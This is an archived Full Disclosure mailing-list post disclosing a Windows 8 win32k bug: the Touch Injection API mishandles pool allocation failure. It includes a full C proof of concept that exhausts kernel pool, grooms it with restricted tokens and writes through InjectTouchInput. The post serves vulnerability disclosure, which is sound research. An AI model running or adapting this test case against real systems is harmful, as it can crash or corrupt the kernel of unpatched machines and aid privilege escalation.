[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] Windows 8 Touch Injection API doesn't handle memory pressure

To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
Subject: [FD] Windows 8 Touch Injection API doesn't handle memory pressure
From: Tavis Ormandy <taviso@xxxxxxxxxxxxx>
Date: Thu, 22 May 2014 11:35:53 -0700

Perhaps this is an unfair oversimplification, but a humorous (to me)
summary of the SDL might be "security is solved because old code is
irrelevant and new code is perfect". For this reason, I can't help
finding it amusing that both old and new Microsoft code keeps failing
so spectacularly.

I mentioned some ancient code that fails yesterday, here's a fun
example of brand new code failing. There is a new Windows 8+ only
feature I've been looking at, the Touch Injection API:

http://msdn.microsoft.com/en-us/library/windows/desktop/hh802898(v=vs.85).aspx

The feature is backed by two new system calls,
win32k!NtUserInitializeTouchInjection and
win32k!NtUserInjectTouchInput. When you initialize touch injection,
you specify the maximum number of simultaneous contacts you want to
support, up to MAX_TOUCH_CONTACTS. This allocates enough space for the
appropriate structures.

Unfortunately, win32k!InitializeTouchInjectionWithQDCData doesn't
handle allocation failure correctly. This can be exploited by
allocating all available pool, and then increasing the number of
contacts requested.

I have a reliable test case for this issue, attached for reference or
at the URL below (only tested on x86, but I don't see why it wouldn't
work on x64).

https://gist.github.com/taviso/4cfc3035e99f2ea1377e

-- 
-------------------------------------
taviso@xxxxxxxxxxxxx | pgp encrypted mail preferred
-------------------------------------------------------

#ifndef WIN32_NO_STATUS
# define WIN32_NO_STATUS
#endif
#include <windows.h>
#include <assert.h>
#include <stdio.h>
#include <winerror.h>
#include <winternl.h>
#include <stddef.h>
#include <winnt.h>
#ifdef WIN32_NO_STATUS
# undef WIN32_NO_STATUS
#endif
#include <ntstatus.h>

#pragma comment(lib, "ntdll")
#pragma comment(lib, "user32")
#pragma comment(lib, "gdi32")
#pragma comment(lib, "advapi32")

// InitializeTouchInjection() Win8.1 Testcase
// -- Tavis Ormandy <taviso@xxxxxxxxxx>, Feb 2014.

int main(int argc, char **argv)
{
    POINTER_TOUCH_INFO Contact;
    SID_AND_ATTRIBUTES SidToRestricted;
    ULONG Size;
    HANDLE Handle;

    ZeroMemory(&Contact, sizeof Contact);
    ZeroMemory(&SidToRestricted, sizeof SidToRestricted);

    // I *think* TOUCH_MASK_CONTACTAREA is required (i.e. rcContact), the rest
    // just need to be valid.
    Contact.pointerInfo.pointerType             = PT_TOUCH;
    Contact.pointerInfo.pointerFlags            = POINTER_FLAG_DOWN | 
POINTER_FLAG_INRANGE | POINTER_FLAG_INCONTACT;
    Contact.pointerInfo.ptPixelLocation.x       = 'AAAA';
    Contact.pointerInfo.ptPixelLocation.y       = 'AAAA';
    Contact.rcContact.left                      = 'AAAA';
    Contact.rcContact.right                     = 'AAAA';
    Contact.rcContact.top                       = 'AAAA';
    Contact.rcContact.bottom                    = 'AAAA';
    Contact.touchFlags                          = TOUCH_FLAG_NONE;
    Contact.touchMask                           = TOUCH_MASK_CONTACTAREA;
    Size                                        = SECURITY_MAX_SID_SIZE;
    Handle                                      = INVALID_HANDLE_VALUE;
    SidToRestricted.Sid                         = _alloca(Size);

    CreateWellKnownSid(WinNullSid, NULL, SidToRestricted.Sid, &Size);

    // This just exhausts available pool (how that's accomplished is 
irrelevant).
    for (Size = 1 << 26; Size; Size >>= 1) {
        while (CreateRoundRectRgn(0, 0, 1, Size, 1, 1))
            ;
    }

    for (;;) {
        // Initialize touch injection with very small number of contacts.
        InitializeTouchInjection(1, TOUCH_FEEDBACK_DEFAULT);

        // Now increase the number of contacts, which should (eventually) cause 
an allocation fail.
        InitializeTouchInjection(MAX_TOUCH_COUNT, TOUCH_FEEDBACK_DEFAULT);

        // I think this will just massage the pool, sequence found by fuzzing.
        OpenProcessToken(GetCurrentProcess(), MAXIMUM_ALLOWED, &Handle);
        CreateRestrictedToken(Handle, 0, 0, NULL, 0, NULL, 1, &SidToRestricted, 
&Handle);

        // Write something to the touch injection allocation.
        InjectTouchInput(1, &Contact);
    }

    return 0;
}

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: Re: [FD] [KIS-2014-06] Dotclear <= 2.6.2 (Media Manager) Unrestricted File Upload Vulnerability
Next by Date: [FD] SQL Injection on eBay subdomain
Previous by thread: [FD] rcrypt packer/crypter writeup and POC tool
Next by thread: [FD] SQL Injection on eBay subdomain
Index(es):
- Date
- Thread